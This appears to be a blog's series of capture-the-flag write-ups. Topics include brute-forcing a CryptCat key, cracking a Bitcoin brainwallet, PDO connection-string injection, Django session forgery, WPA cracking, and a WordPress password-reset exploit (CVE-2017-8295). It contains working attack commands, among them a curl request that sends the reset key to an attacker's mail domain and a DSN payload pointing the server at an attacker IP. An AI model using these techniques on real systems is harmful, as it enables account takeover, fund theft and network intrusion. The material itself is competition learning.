Solution (ver t0k3n)

Analyzing the PCAP we've discovered that the Agent Smith is running a secure communication service @ 52.204.153.56:443 and received the ver t0k3n on plaintext.

Following the TCP stream we got this conversation:

A. Smith: GGoCySEA Agent Comms Link
A. Smith: Agent Smith here... 
Client: Agent Smith, this is Agent Rollins, I was told I could contact you here.
A. Smith: This is Agent Smith, send your verification t0k3n
Client: th3 ver t0k3n y0u s33k is: !@mag3ntr0ll!n$
A. Smith: ver t0k3n verified, what can I do for you?
Client: I...ve sent you a file that you need to look at on open comms channel
A. Smith: I have it, but you shouldn...t send files over that channel you need to use secure comms, connect to 8989 for the software then connect to the secure comms channel on 4443, send your seccomms verification t0k3n once you connect
...comms out...

Solution (seccomms t0k3n)

Agent Rollins (client) made a mistake to sent a confidential file on open channel (yes, we already intercepted this before and extracted some t0k3ns from it).

Then Agent Smith called the attention to use a specific secure software to send/receive sensitive data.

..this software:

• Was downloaded from port 8989;
• Used the A. Rollins seccomms t0k3n to establish the communication;
• And possibly used to sent more sensitive data. Our cry t0k3n maybe?

So, searching for packets that passed through 8989 port, the first occurrence was this ELF binary.

After some research we figured out this is a modded version of CryptCat. Cryptcat is the standard netcat enhanced with Twofish encryption.

They changed/added some args description on the software:

• -T - display a temporary seccoms t0k3n (this is not our token yet, we need the token used by Agent Rollins);
• -k - set a peer-to-peer pre-shared key.

If you send some data without setting the -k it will encrypt w/ Twofish using the default key, setting -k you can use your own privkey.

Well, A. Smith said he should use port 4443 for communication through this software, let's take a look.

Interesting..
Some encrypted data (unknown header/body/footer).

Why not try to put up the binary as server ./elf.elf -vvlp 4445 and send this data back emulating the server answer?

This is what we did..
Using Python to take more control of the data flow and possibly figure out the encryption we sent back to localhost the bytes of first server answer:

..and we got it decrypted! So, we wrote this script...

import sys, binascii  
from pwn import *

HOST = '127.0.0.1'  
PORT = 4445  
conn = remote(HOST,PORT,typ="tcp")

## Attention to the Twofish pattern 16 bytes key + data
encdata = "2c087117c9d469d622f3a117de0990e3"  
encdata += "d52cb4e656ce4e0ce2ad7882715f451a2a41cb53ed889e1909ef0c245cdbd5474637987eb7b9ca3b0ebfe23a01d5bf7f518ed86b4d3c"  
encdata += "b52eb51ac555153b4eb9a26d0ef9be46"  
encdata += "06b5f2e428d3ab42a9920973f39e6d614699950dadca96952d9911de146fef0e83640a727cdb06af681434f46ec20be62ec7d39c1d6fa14f1c595e84284db71c5e07a2d18311d8"  
encdata += "4a822e4ca0efad0543e2f7aec7c5c9de"  
encdata += "eda3ee5bb3e046d837cca186570c41e05877d30e94392539b07e1e879fd0d6d76fea04e476a7592a6ae61ffea2c4809b8406ac5e127f96cbb666c6e73246030e0f5c8cd1dc3f6b51bc0bf4d4bc5e829947890ca59caf6d49b9e702cc745e26047d42c812fa15e242d14b121ef83d09c756a5"  
encdata += "33078bb44d6de30bb799eeb5f8f125d2"  
encdata += "b209c7d65f08981b9935b9114538facc2a599f6f3ecbed7af1e738b960489dce"  
encdata = binascii.unhexlify(encdata)

conn.sendline(encdata)  

..to decode the entire conversation.

Server: GGoCySEA Secure Comms Link
Client: This is Agent Rollins checking back in
Server: send your seccomms verification t0k3n
Client: th3 seccoms t0k3n y0u s33k is: ag3ntr0ll!n$s3cur3c0mm$
Server: secure comms t0k3n verified, send your file with the GovSec Agency approved password on port 6345
...comms out...

Solution (cry t0k3n)

As you can see, decoding the last comm we got:

• Agent Rollins seccoms tok3n;
• A new port, 6345 used to send files encrypted w/ a custom password aproved by GovSec Agency.

Back to PCAP we confirmed that a good amount of encrypted data(57kb) has passed through this port.

So, we have the encrypted data and the Software to decrypt it. But.. how about the password? We can bruteforce or reverse it?

During the CTF we've found some passwords, but how to test it?

The first thing is to figure out how to use the -k (pre-shared key) in a way to bruteforce it.

As you can see it works like a charm..

1. We created a dummy file w/ some content;
2. Setup a server w/ a supersecretpassword;
3. Sent the dummy file w/ the correct password and got it decrypted on the other side;
4. If the password was wrong, it didn't even try to decrypt it.. 0 bytes are transferred and the connection is killed.

## server side
$ ./elf.elf -k supersecretpassword 127.0.0.1 -vvvlp 6345

## client side
$ ./elf.elf -w 1 -k supersecretpassword 127.0.0.1 6345 < dummyfile

Note: i've used -w 1 to set a timeout, otherwise when the password was correct it keeps the connection opened.

Now we back to PCAP and extracted the 1st encrypted chunk. If we can decrypt it we will got a known file header confirming the decryption success.

So, we launched a endless loop acting as client sending the encrypted chunk..

$ while true; do nc 127.0.0.1 6345 < 1stchunk; done

Note: We are using netcat instead CryptCat because this chunk already is encrypted, we don't want to encrypt again, right?

On the server side we launched a multi-thread python bruteforce script, it will run until we get some decrypted data!

And done, the script found the password freedom246 on rockyou.txt! We also have the 1st chunk decrypted..

With 20 threads it stills took some time because the bottleneck on the client side single thread. (if you did it in a smarter way, plz let me know).

Now, with the password we can decrypt every chunk and merge it in a single file.

ops..
not yet!

If you try to send the entire conversation to it, the 57kb, it overflow the Cryptcat buffer[8192] and returns a Segmentation fault.

I've tried a lot to split it into chunks of 8192 bytes, it works but we have some problem w/ PNG IDAT and CRC shit.

So, the solution we found was to patch the CryptCat to allow a bigger buffer. To do this..

Download the http://cryptcat.sourceforge.net/ source.

On netcat.c increase the BIGSIZ size 8192 to 9193...

On farm9crypt.cc also increase the outBuffer, inBuffer and size size..

Recompile w/ make linux..

Now just send the entire dump..

..do it to retrieve the cry t0k3n.

References

• Cryptcat, The standard netcat enhanced with twofish encryption with ports for WIndows NT, BSD and Linux - http://cryptcat.sourceforge.net/
• h3x_pr0ph3ts team, https://www.cyberlympics.org/?portfolio=team-h3x-pr0ph3ts-2017
• nc linux man page, https://linux.die.net/man/1/nc
• Another solution(by v0s) to bruteforce cryptcat twofish key - https://gist.github.com/v0s/002f1c7cc6dca258417c19a1eabff858

This weekend I helped the team of friends, H3x Pr0ph3ts in Global Cyberlympics Pre-Quals. At some point of the competition we found this file containing a Bitcoin Paper Wallet addressed to Agent Smith

Bitcoin wallets

• Private key, a single unsigned 256 bit integer (32 bytes)
• Public key, a number that corresponds to a private key, but does not need to be kept secret.

A public key can be calculated from a private key, but not vice versa.

Looking at the image, our objective is recover the private key in a way to import into a new wallet to take control of Agent Smith funds. (Or just post it as flag).

The public key is not properly blurred, we can read it.. but the private key is unreadable(maybe not for this guy who almost recovered the private key from blurry qrcode).

Bitcoin wallets are secure and is impossible to recover the private key if it was properly random generated. My thoughts is they used a Brain Wallet, a bitcoin wallet derived from a Passphrase, a password easy to memorize.

What is the problem with Brain Wallets?

Brain wallets can be brute forced because it is based on a simple password, and to make it worse, humans love to reuse passwords.

To help with the task i've used a tool created by Ryan Castellucci, he made a awesome talk @ DEFCON 23 about this.

Before input the public address in brainflayer we need to follow the reverse path of creating a bitcoin wallet. The first task is extract the Hash160 from pubkey public address.

• Pubkey(b58c): 175sZR2eBf6JapbxWZFJk3qeicUsg3Atqr
• Hash160: 42BC9F7ABBE700EA1E105D9877E6DE82F77F370B

From this HEX, pre-compute the BLF..

$ echo 175sZR2eBf6JapbxWZFJk3qeicUsg3Atqr > ex2.hex
$ hex2blf ex2.hex ex2.blf

And run brainflayer against it using a common password list, my first try was the classic rockyou.txt

Bingo!

42bc9f7abbe700ea1e105d9877e6de82f77f370b:u:sha256:itsasecret

itsasecret is a passphrase used to create the brainwallet.

..now create a new brain wallet w/ the recovered passphrase

Take the secret exponent and keep following the reverse path of creating a bitcoin wallet, the final step is to convert it to Base58Check

Now you have a valid bitcoin wallet privkey. You can import it to a wallet and recover A. Smith funds.

FLAG: 5J4whis157ZkfhPa1CfEzExR4VE7HGRx3fYBYNe73dGMPyrG2Hg

References

• Technical background of version 1 Bitcoin addresses
• DEF CON 23 - Ryan Castellucci - Cracking CryptoCurrency Brainwallets
• A proof-of-concept cracker for cryptocurrency brainwallets
• http://bitcoinvalued.com/tools.php
• https://brainwalletx.github.io/#generator

Give me the flag.

To start your challenge environment: https://shellterlabs.com/en/ctf-master/shellter-hacking-express-master/shx-13/shx13-restricted-area/

Solution

A simple login form was presented to us..

I started the recon checking the HTTP methods, directory/file bruteforce, SQLi tests, found nothing suspect.

But when fuzzing the postdata uname=test&pword=test123&group=users the server crashed and i need to restart the environment..

Noticed this happens only when the group field data is changed. Changing it to everything different from users returned a PDO error PDOException :: 1049

curl -i -s -k  -X 'POST' \  
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Referer: http://lab.shellterlabs.com:32849/' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' \
    -b 'PHPSESSID=i1vki30916t1r7bjaprovmsi31' \
    --data-binary $'uname=test&pword=test123&group=usersAAA' \
    'http://lab.shellterlabs.com:32849/login.php'

1049 error code means unknown database

Nice, we can control the choosen database, you can confirm this trying to select some built-in MySQL database like sys

As you can see, no PDO error!

Well, searching for php PDO documentation I found this reference..

<?php  
/* Connect to a MySQL database using driver invocation */
$dsn = 'mysql:dbname=testdb;host=127.0.0.1';
$user = 'dbuser';
$password = 'dbpass';

try {  
    $dbh = new PDO($dsn, $user, $password);
} catch (PDOException $e) {
    echo 'Connection failed: ' . $e->getMessage();
}

?>

A PDO connection sample.. maybe we can have full control of $dsn. Let's give a try..

Payload: uname=test&pword=test123&group=users;host=127.0.0.1  
Answer: PDOException :: 1130  

Hmm, error code changed to 1130, it means not allowed to connect to this MySQL server. Awesome! we can point it to connect at any IP!

Obviously i launched a locally netcat listening at port 3000, and tried to get a reverse connection w/ this payload uname=test&pword=test123&group=sad;host=MY_IP;port=3000

Bam! the Shellter server is trying to connect here and when I close netcat connection it return another error code PDOException :: 2013 which means Lost connection to MySQL server

Then I setup a MySQL server locally and launched wireshark to see what's happening in raw background..

The server is trying to authenticate here with pdo_user, and some password we don't know..

.. the password is hashed to XXXXXXXXXXX2f337c1f8f458c8c8929e370dc494, tried to crack w/ some common passwords and masks but no success.

I've created the pdo_user, but how to solve the password problem? The server needs to authenticate here before start sending queries, it's explicit (using pass word: YES)

Time ago while working w/ MySQL, I remember a situation where I lost the root password, then I've used a command line argument to launch mysqld disabling grants, then was possible to access all my database sending null/invalid passwords.

mysqld --skip-grant-tables

..now the server authenticated and start doing some queries..

Perfect.. all we need to do now is create a database users with username/password structure and insert our valid user..

INSERT INTO `users` (`username`, `password`) VALUES ('test', 'test123');  

No more error, and now we got a 302 redirection to a page different from index.php

We are logged into the system, and here is our flag!

As always.. awesome challenge ShellterLabs

References

• PDO Connections and Connection management - http://php.net/manual/en/pdo.connections.php
• PDO::errorCode - http://php.net/manual/en/pdo.errorcode.php

There is something wrong with this icon.

Solution

There's a Brazilian icon flag..

With a ZIP file inside. So, I dumped the ZIP and tried to extract..

Nope! requires a password, and i have no clue where found it.

So I launched the hex-editor to do a deep look into this..

Here's our ZIP, starting by the hex signature 50 4B 03 04, and a lot of junk below..

You can see this clealy dumping the hex and adjusting the columns

$ xxd -c 76 ico.ico > xxx

At the first sight I thought it was a reflection of the bytes used to create the ICO file..

But no, this is an ASCII Art generated from the .ico image and strategically added to the end of the file, if you remove this, the ico still working displaying the Brazilian flag.

So, I've started removing/filling w/ zero bytes the zipfile and all that could be junk to see what happens w/ the ICO..

After A LOT of tries.. BAM! I can see another ICO beyond the Brazilian flag, this icon showed the password prefix of the ZIP file, then the brute-force becomes easy!

The flag..

I'm not sure if this was the correct correct way to solve it, but it worked!

Solution update

After scored the flag I talked w/ the admin, and I really solved w/ a lot of overthink(like always..).

This icon w/ the password is concatenated at the end of the file!

But it may be tricky to cut because the ICO signature is 00 00 01 00 and it can be found at the footer of the every ZIP file. This complicated my attempts to crop the icon.

You need to figure out the footer of ZIP file and the header of ICO file to start the crop.

And that ASCII art? Is not an ASCII art, It was generated by ICO like as I was thinking..

Can you read the admin's email?
User: billy
Pass: TheKid

Solution

There's a mail system, if you input the given credentials..

..it will login and display a email sent from administrador.

...

I dug up the system and found no other functionality.

So, to read the email you do this POST request:

POST /viewmail/ HTTP/1.1  
Host: lab.shellterlabs.com:32867  
Content-Length: 63  
Cache-Control: max-age=0  
Origin: http://lab.shellterlabs.com:32867  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Referer: http://lab.shellterlabs.com:32867/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: sessionid="billy:6405552caf11c7b1aa5b18a3346ae1f13eafa516"; csrftoken=s3iaLUoYZpWFkJaaMjvj8YOsCATokC9e  
Connection: close

csrfmiddlewaretoken=s3iaLUoYZpWFkJaaMjvj8YOsCATokC9e&email_id=1  

The csrfmiddlewaretoken has not working here, It just need to be equal the cookie csrftoken. But when you change the sessionid on cookie the request will fail:

Well, the challenge consists in read the email of the administrator. The footer gives the clue, the SHX Mail Administrator username is nealcaffrey.

To read the nealcaffrey email we need to forge his sessionid, but how?

I started by fuzzing the form fields and when I sent some symbols it triggered a django debuggin page displaying details from an exception and leaking part of the source code.

Nice, the administrator forgotten to disable Debug in a production environment, very common..

def generate_session_token(username):  
    user_hash = sha1(username).digest()
    return stream_cipher(user_hash).encode('hex')

This code is showing us how the sessionid is created:

• The user_hash is the hex of sha1("billy")
• sessionid is the hex result of some Stream Cipher algorithm over the user_hash

What is a Stream Cipher?

Wikipedia says: A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream.

We don't know which algorithm is used, there's so much popular stream cipher algorithms out there, but the most common one is a simple XOR byte-per-byte and I bet the challenger used it. But to test it we need first recover the key used in encryption.

Recovering the key and the flag

• Create the billy_user_hash
• XOR byte-per-byte billy_user_hash with sessionid_hash
• Now we can XOR the key with any username_user_hash, including nealcaffrey_user_hash to get a valid admin sessionid

Final script

Just for note, you can replace this xor_bytearray() function and part of this code by a simple hex(hex1 ^ hex2), because Python do a xor byte-wise by default in HEX values!

..and the flag

Thanks ShellterLabs and RoboCore, awesome contest!

Can you read the flag?

Solution

So, i've received only the image shuffled.png

It seems that the challenger pasted the flag four times then shuffled it somehow..

Taking a closer look we can see what possibly happened. The image was cutted in 1px lines then shuffled!

Well, we need to unshuffle it, but how? Doing by hand is not an option.

I started by cropping it from image..

..then, wrote a script to:

• slice the image line by line, 1px of height
• put filenames into an array
• shuffle the array
• rejoin the pieces
• loop it N times and join the results

Sliced samples

Result

The result is flag.jpg, a big file w/ 100 iterations..

And luckly you will get a readable iteration..

if not, try again until you get!

The title tip Thx helped me a lot!

References

• Stackoverflow - Cutting one image into multiple images using the Python Image Library - https://stackoverflow.com/questions/6059217/cutting-one-image-into-multiple-images-using-the-python-image-library
• Stackoverflow - Combine several images horizontally with Python - https://stackoverflow.com/questions/30227466/combine-several-images-horizontally-with-python

Você tem um blog Wordpress e uma sensação de falta de patch...
Link: http://34.202.17.29/
OBS: A flag está no formato CR2017{flag}

Solution

TL;DR

marcioRAGarcia hosted a mailserver w/ a catch-all mailbox and we exploited CVE-2017-8295 vulnerability.

Fingerprinting w/ WPScan..

• WordPress version 4.7.4 (Released on 2017-04-20) identified from meta generator

If the version is <= 4.7.4, this installation may be vulnerable to CVE-2017-8295

WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for this message to bounce or be resent, leading to transmission of the reset key to a mailbox on an attacker-controlled SMTP server.

This vuln is discovered by Dawid Golunski from ExploitBox.io, more details and a well written PoC here.

All we need to do:

• Enumerate the Wordpress admin username (wpscan can help..)
• Host a mail server w/ a catch-all mailbox *@attackerdomain.com
• Intercept the POST /wp-login.php?action=lostpassword, rewrite the Host header to our own mail server domain and replay this request.

The Wordpress will use SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email.

If for some reason(mailbox out of quota or any delivery error) the server is unable to deliver the email into the admin mailbox it will return to Return-Path, our mailbox@ourdomain.com

Enumerating wordpress users..

wpscan -u http://34.202.17.29/ --enumerate u

[+] Identified the following 1 user/s:
    +----+------------+-----------------+
    | Id | Login      | Name            |
    +----+------------+-----------------+
    | 1  | ch405admin | ch405admin      |
    +----+------------+-----------------+

Nice, we have our admin username ch405admin

Now, marcioRAGarcia used your own domain/mailserver to create the catch-all mailbox to receive the reset password mail and we rewrite/replay the POST /wp-login.php?action=lostpassword

curl -i -s -k  -X 'POST' \  
    -H 'Origin: http://34.202.17.29' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3020.89 Safari/537.32' 
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H 'Referer: http://34.202.17.29/wp-login.php?action=lostpassword' \
    -H 'Host: marciogarcia.com.br' \
    -b 'wordpress_test_cookie=WP+Cookie+check' \
    --data-binary $'user_login=ch405admin&redirect_to=&wp-submit=Get+New+Password' \
    'http://34.202.17.29/wp-login.php?action=lostpassword'

..and server sent us the flag inside the password reset mail!

Awesome contest Criptorave / CRYP70 CH405 / RTFM

Local CTF

Congratz to mtps3(Matheus), our local player for winning this contest!

References

• CVE-2017-8295 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
• WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day) - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

We intercepted this communication on the internal network and we made a pivoting to the administration page of a spy cell, but we do not have a wifi password to decode and access a page of them. Can you help us?
Tip: I think they use a custom password with shx.

Solution

On this challenge we have access to a router administration page..

and a pcap file..

I've bruteforced this router admin page w/ some common logins/passwords, but no success..

If we load this .pcap at Wireshark, all 802.11 traffic is encrypted.. so we need to crack this password and decrypt w/ master key.

Used aircrack-ng extracting the hash to work with Hashcat (with Hashcat my GPU performs better than John and Pyrit)

aircrack-ng SHX9-01.cap -J shx9  

Update: If you have problem with hccap version, use this: https://hashcat.net/cap2hccapx/ to generate a hccapx. (thx dbaser)

As you can see, it's a WPA-PSK, challenge description give a tip, we need to generate a wordlist containing "shx" at permutations.

So, WPA-PSK starts w/ lentgh = 8, and I do not believe that shellterlabs used a password above 8~9 digits because it would consume a lot of processing power to crack.

Then, my 1st permutation started w/ shx?1?1?1?1?1, every ?1 contains ?l?d?s, all lower letters, simbols and digits. Hashcat is awesome, because we can do this permutations on the fly..

/home/intrd/appz/hashcat/hashcat64.bin -m 2500 shx9.hccap -a3 -1 ?l?d?s shx?1?1?1?1?1

Nice! Recovered the password on my first try! If won't worked i'll try ?1?1?1?1?1shx and soon, crunch can help u w/ more advanced permutations.

Wireshark needs WPA-PSK Master Key to decrypt traffic and hashcat didn't give to us..

Knowing the plain text password is easy to get the Master Key doing this:

echo "sample@p@ssword" >> pwds  
echo "sample@p@ssword" >> pwds  
echo "sample@p@ssword" >> pwds  
aircrack-ng -b 18:A6:F7:8F:2B:F0 -w pwds SHX9-01.cap  

With the master key, launch Wireshark and decrypt all 802.11 traffic between client and router.

Update: You can decrypt traffic without the need of wireshark airdecap-ng -e shx9 -p sample@p@ssword SHX9-01.cap, thx marcioRAGarcia )

And now, follow all the GET/POST requests between router and client and you will find the HTTP basic auth coded in base64 w/ our admin page login/password!

echo captured_http_basicauth | base64 --decode  

Router pwned, client pwned!
..and there is our flag!

References

• Hashcat wiki - https://hashcat.net/wiki/
• How to Crack WPA/WPA2 - https://www.aircrack-ng.org/doku.php?id=cracking_wpa